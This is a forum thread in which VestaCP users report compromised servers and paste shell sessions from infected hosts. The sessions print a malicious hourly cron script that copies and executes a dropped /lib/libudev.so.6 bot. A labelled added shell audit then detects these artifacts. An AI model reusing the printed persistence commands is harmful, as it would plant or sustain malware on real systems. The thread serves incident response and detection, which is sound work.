We are happy to announce that Vesta is back under active development as of 25 February 2024. We are working on v1 candidate and expect to engage more with the community over the coming months. We are committed to open source, and we encourage contributors to help us build the future of Vesta.
Got 10 VestaCP servers exploited
- Posts: 73
- Joined: Sun Dec 03, 2017 6:30 pm
Re: Got 10 VestaCP servers exploited
As I said, I took a backup before the breach and reinstalled all servers.
Re: Got 10 VestaCP servers exploited
ls -tl /usr/bin | less
cat /etc/cron.hourly/gcc.sh
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
[root@waterleafshop public_html]# ll /etc/init.d/
итого 48
-rw-r--r-- 1 root root 17500 май 3 2017 functions
-rwxr-xr-x 1 root root 4334 май 3 2017 netconsole
-rwxr-xr-x 1 root root 7293 май 3 2017 network
-rw-r--r-- 1 root root 1160 мар 7 07:27 README
-rwxr-xr-x 1 root admin 295 апр 5 10:50 update
-rwxr-xr-x 1 root root 2074 янв 10 06:25 vesta
[root@waterleafshop public_html]# clamscan -r -i /usr
-bash: clamscan: команда не найдена
[root@waterleafshop public_html]# ll /etc/cron.hourly/
итого 12
-rwxr-xr-x 1 root root 392 авг 3 2017 0anacron
-rwxr-x--- 1 root root 172 янв 8 08:27 awstats
-rwxr-xr-x 1 root admin 228 апр 5 10:50 gcc.sh
[root@waterleafshop public_html]# cat /etc/cron.hourly/gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
[root@waterleafshop public_html]# cat /etc/cron.hourly/0anacron
#!/bin/sh
# Check whether 0anacron was run today already
if test -r /var/spool/anacron/cron.daily; then
day=`cat /var/spool/anacron/cron.daily`
fi
if [ `date +%Y%m%d` = "$day" ]; then
exit 0;
fi
# Do not run jobs when on battery power
if test -x /usr/bin/on_ac_power; then
/usr/bin/on_ac_power >/dev/null 2>&1
if test $? -eq 1; then
exit 0
fi
fi
/usr/sbin/anacron -s
[root@waterleafshop public_html]# ls -tl /usr/bin | less
[root@waterleafshop public_html]# ls -tl /usr/bin | less
[6]+ Stopped ls --color=auto -tl /usr/bin | less
[root@waterleafshop public_html]# clear
[root@waterleafshop public_html]# ls -tl /usr/bin | less
-rwxr-xr-x 1 root root 48451 июн 9 2014 zipdetails
-rwxr-xr-x. 1 root root 19568 июн 9 2014 last
-rwxr-xr-x. 1 root root 11240 июн 9 2014 mesg
-r-xr-sr-x. 1 root tty 15344 июн 9 2014 wall
-rwxr-xr-x 1 root root 167272 июн 9 2014 aspell
-rwxr-xr-x 1 root root 11320 июн 9 2014 prezip-bin
-rwxr-xr-x 1 root root 11296 июн 9 2014 word-list-compress
-rwxr-xr-x 1 root root 988 июн 9 2014 ispell
-rwxr-xr-x 1 root root 122 июн 9 2014 spell
-rwxr-xr-x 1 root root 5656 июн 9 2014 precat
-rwxr-xr-x 1 root root 5656 июн 9 2014 preunzip
-rwxr-xr-x 1 root root 5656 июн 9 2014 prezip
-rwxr-xr-x 1 root root 85 июн 9 2014 run-with-aspell
-rwxr-xr-x. 1 root root 2086 июн 9 2014 run-parts
-rwxr-xr-x. 1 root root 19688 июн 9 2014 pkla-admin-identities
-rwxr-xr-x. 1 root root 27960 июн 9 2014 pkla-check-authorization
-rwxr-xr-x. 1 root root 45448 июн 9 2014 pkg-config
-rwxr-xr-x 1 root root 329664 июн 9 2014 flex
-rwxr-xr-x. 1 root root 15768 июн 9 2014 hostname
-rwxr-xr-x. 1 root root 30488 июн 9 2014 testgdbm
-rwxr-xr-x. 1 root root 37528 июн 9 2014 catman
-rwxr-xr-x. 1 root root 87024 июн 9 2014 lexgrog
-rwxr-xr-x. 1 root root 102736 июн 9 2014 man
-rwxr-xr-x. 1 root root 125088 июн 9 2014 mandb
-rwxr-xr-x. 1 root root 33224 июн 9 2014 manpath
-rwxr-xr-x. 1 root root 46456 июн 9 2014 whatis
-rwxr-xr-x 1 root root 40824 июн 9 2014 recode
-rwxr-xr-x. 1 root root 147880 июн 9 2014 eqn
-rwxr-xr-x. 1 root root 83584 июн 9 2014 groff
-rwxr-xr-x. 1 root root 144232 июн 9 2014 grops
-rwxr-xr-x. 1 root root 100952 июн 9 2014 grotty
-rwxr-xr-x. 1 root root 184736 июн 9 2014 pic
-rwxr-xr-x. 1 root root 192048 июн 9 2014 post-grohtml
-rwxr-xr-x. 1 root root 41864 июн 9 2014 preconv
-rwxr-xr-x. 1 root root 88312 июн 9 2014 pre-grohtml
-rwxr-xr-x. 1 root root 33368 июн 9 2014 soelim
-rwxr-xr-x. 1 root root 118744 июн 9 2014 tbl
-rwxr-xr-x. 1 root root 525272 июн 9 2014 troff
-rwxr-xr-x. 1 root root 3392 июн 9 2014 nroff
-rwxr-xr-x. 1 root root 271 июн 9 2014 neqn
-rwxr-xr-x 1 root root 13581 июн 9 2014 pod2man
-rwxr-xr-x 1 root root 11004 июн 9 2014 pod2text
-rwxr-xr-x 1 root root 83424 июн 9 2014 bc
-rwxr-xr-x 1 root root 45392 июн 9 2014 dc
-rwxr-xr-x 1 root root 3724 фев 3 2014 ipcount
-rwxr-xr-x 1 root root 982 фев 3 2014 iptab
-rwxr-xr-x 1 root root 2953 окт 10 2008 zipgrep
cat /etc/cron.hourly/gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
# cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
Re: Got 10 VestaCP servers exploited
Code:
# cat /opt/backup/etc/cron.hourly/gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
Code:
# cat /opt/backup/etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
Code:
# ls -tl /opt/backup/usr/bin | less
total 245832
lrwxrwxrwx 1 root root 38 Mar 30 15:17 npm -> ../lib/node_modules/npm/bin/npm-cli.js
lrwxrwxrwx 1 root root 38 Mar 30 15:17 npx -> ../lib/node_modules/npm/bin/npx-cli.js
lrwxrwxrwx 1 root root 9 Mar 30 15:16 phar -> phar.phar
-rwxr-xr-x 1 root root 33983272 Mar 30 07:10 node
-rwxr-xr-x 1 root root 204552 Mar 29 12:02 memcached
-rwxr-xr-x 1 root root 6110 Mar 29 02:06 memcached-tool
-rwxr-xr-x 1 root root 4935304 Mar 28 14:27 php
-rwxr-xr-x 1 root root 4828904 Mar 28 14:27 php-cgi
-rwxr-xr-x 1 root root 5120416 Mar 28 14:27 zts-php
-rwxr-xr-x 1 root root 14823 Mar 28 14:27 phar.phar
-rwxr-xr-x 1 root root 5475 Mar 28 14:27 php-config
-rwxr-xr-x 1 root root 4776 Mar 28 14:27 phpize
-rwxr-xr-x 1 root root 5659 Mar 28 14:26 zts-php-config
-rwxr-xr-x 1 root root 4788 Mar 28 14:26 zts-phpize
lrwxrwxrwx 1 root root 42 Mar 25 20:04 uglifyjs -> ../lib/node_modules/uglify-js/bin/uglifyjs
lrwxrwxrwx 1 root root 39 Mar 25 17:24 uglifycss -> ../lib/node_modules/uglifycss/uglifycss
lrwxrwxrwx 1 root root 11 Mar 25 17:07 audit2why -> audit2allow
lrwxrwxrwx 1 root root 3 Mar 25 15:46 twopi -> dot
lrwxrwxrwx 1 root root 3 Mar 25 15:46 sfdp -> dot
lrwxrwxrwx 1 root root 3 Mar 25 15:46 osage -> dot
lrwxrwxrwx 1 root root 3 Mar 25 15:46 patchwork -> dot
lrwxrwxrwx 1 root root 3 Mar 25 15:46 neato -> dot
lrwxrwxrwx 1 root root 6 Mar 25 15:46 gxl2dot -> gxl2gv
lrwxrwxrwx 1 root root 6 Mar 25 15:46 gv2gxl -> gxl2gv
lrwxrwxrwx 1 root root 6 Mar 25 15:46 dot2gxl -> gxl2gv
lrwxrwxrwx 1 root root 3 Mar 25 15:46 fdp -> dot
lrwxrwxrwx 1 root root 3 Mar 25 15:46 circo -> dot
lrwxrwxrwx 1 root root 21 Mar 25 14:02 jjs -> /etc/alternatives/jjs
lrwxrwxrwx 1 root root 25 Mar 25 14:02 keytool -> /etc/alternatives/keytool
lrwxrwxrwx 1 root root 22 Mar 25 14:02 orbd -> /etc/alternatives/orbd
lrwxrwxrwx 1 root root 25 Mar 25 14:02 pack200 -> /etc/alternatives/pack200
lrwxrwxrwx 1 root root 28 Mar 25 14:02 policytool -> /etc/alternatives/policytool
lrwxrwxrwx 1 root root 22 Mar 25 14:02 rmid -> /etc/alternatives/rmid
lrwxrwxrwx 1 root root 29 Mar 25 14:02 rmiregistry -> /etc/alternatives/rmiregistry
lrwxrwxrwx 1 root root 28 Mar 25 14:02 servertool -> /etc/alternatives/servertool
lrwxrwxrwx 1 root root 27 Mar 25 14:02 tnameserv -> /etc/alternatives/tnameserv
lrwxrwxrwx 1 root root 27 Mar 25 14:02 unpack200 -> /etc/alternatives/unpack200
lrwxrwxrwx 1 root root 22 Mar 25 14:02 java -> /etc/alternatives/java
lrwxrwxrwx 1 root root 4 Mar 23 20:56 lex -> flex
lrwxrwxrwx 1 root root 4 Mar 23 20:56 flex++ -> flex
lrwxrwxrwx 1 root root 3 Mar 23 20:56 pftp -> ftp
lrwxrwxrwx 1 root root 15 Mar 23 20:56 nail -> ../../bin/mailx
lrwxrwxrwx 1 root root 15 Mar 23 20:56 Mail -> ../../bin/mailx
lrwxrwxrwx 1 root root 5 Mar 23 20:56 mail -> mailx
lrwxrwxrwx 1 root root 7 Mar 23 20:56 dsync -> doveadm
lrwxrwxrwx 1 root root 9 Mar 23 20:56 webazolver -> webalizer
lrwxrwxrwx 1 root root 9 Mar 23 20:56 rrdcreate -> rrdupdate
lrwxrwxrwx 1 root root 9 Mar 23 20:56 rrdinfo -> rrdupdate
lrwxrwxrwx 1 root root 23 Mar 23 20:56 whois -> /etc/alternatives/whois
lrwxrwxrwx 1 root root 2 Mar 23 20:55 mcedit -> mc
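As an added example, not code from the thread or from the VestaCP project, here is a small POSIX shell audit that checks a root tree (the live system, or a mounted backup like the /opt/backup copy inspected above) for the artifacts these posts show: the gcc.sh hourly cron job, the dropped /lib/libudev.so.6, any cron or init script that references it, and cron/init files whose group is not the expected one (the infected hosts show root:admin on gcc.sh and /etc/init.d/update). The function name scan_tree and the expected-group parameter are assumptions.

```shell
#!/bin/sh
# Added example (not from the thread): audit a root filesystem, either the
# live "/" or a mounted backup such as the /opt/backup tree shown above, for
# the persistence artifacts reported in this thread:
#   1. /etc/cron.hourly/gcc.sh and the dropped /lib/libudev.so.6 binary
#   2. any cron/init script that carries the "libudev.so.6" copy-and-run lines
#   3. cron/init scripts whose group is not the expected one (the infected
#      hosts show "root admin" on gcc.sh and /etc/init.d/update)
# scan_tree is an assumed helper name. It prints one FINDING line per hit
# plus a SUMMARY line and always returns 0, so it is safe under "set -e".
scan_tree() {
    root=${1:-/}
    expected_group=${2:-root}
    root=${root%/}                  # "" for "/", so "$root/etc" stays valid
    hits=0

    # 1. Exact paths used by the dropper seen in this thread.
    for p in /etc/cron.hourly/gcc.sh /lib/libudev.so.6; do
        if [ -e "$root$p" ]; then
            echo "FINDING: dropper artifact present: $root$p"
            hits=$((hits + 1))
        fi
    done

    for dir in /etc/cron.hourly /etc/cron.daily /etc/init.d; do
        [ -d "$root$dir" ] || continue
        for f in "$root$dir"/*; do
            [ -f "$f" ] || continue
            # 2. Content match, independent of the file name the dropper chose.
            if grep -q 'libudev\.so\.6' "$f" 2>/dev/null; then
                echo "FINDING: script references libudev.so.6: $f"
                hits=$((hits + 1))
            fi
            # 3. Group ownership check; ls -ld is used for portability.
            grp=$(ls -ld "$f" | awk '{print $4}')
            if [ "$grp" != "$expected_group" ]; then
                echo "FINDING: unexpected group '$grp' on $f"
                hits=$((hits + 1))
            fi
        done
    done
    echo "SUMMARY: $hits finding(s) under ${root:-/}"
    return 0
}

# Usage: source this file, then "scan_tree /opt/backup" or "scan_tree /" on a live host.
```

A clean host should report only a SUMMARY line with 0 findings; on a hit, compare the flagged file against its packaged copy before trusting anything else on the box.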
Re: Got 10 VestaCP servers exploited
Those posts do explain the virus and its removal, but even after removal it will eventually reappear because we are still not aware of the vulnerability, which is obviously present somewhere within the system.
Re: Got 10 VestaCP servers exploited
Hello,
Same thing here. Fresh install of Ubuntu 16 a week ago. Installed the latest version of VestaCP and a WordPress right after (no plugins), then on 7th April the server was blocked by OVH for a DDoS attack. Same IP as you guys in China.
My Vesta install: Nginx + php-fpm, vsftpd, exim, iptables + fail2ban, MySQL DB, and that's all.
Hope there will be a fix soon.
All my other servers running the former version of VestaCP don't seem to be impacted, yet.
Re: Got 10 VestaCP servers exploited
Once again, I copy the answer from my hoster, which I posted in another topic.

lukapaunovic wrote: ↑Sat Apr 07, 2018 7:01 pm
Those posts do explain the virus and its removal, but even after removal it will eventually reappear because we are still not aware of the vulnerability, which is obviously present somewhere within the system.

I checked and I had the latest version of Roundcube, 1.3.5. Unfortunately, the hoster did not provide access to an infected server to view other running processes.

At the same time, however, by all appearances the compromise was somehow connected to Vesta and Roundcube, because simultaneously with yours, problems with similar symptoms arose on several other servers of our clients. Those servers also had Vesta installed, and the malicious processes had the Roundcube directory as their current working directory, while the Linux distributions differed.
Re: Got 10 VestaCP servers exploited
Studiomax, I was referring to dpeca's links.
Re: Got 10 VestaCP servers exploited
Users are increasingly coming back to me reporting that their servers are hacked :(
Re: Got 10 VestaCP servers exploited
I think I can handle this.
There are MANY people, MANY servers.
This is CRAZY.
OVH is stubborn, letting me back up some servers, some not.
I'm gonna die.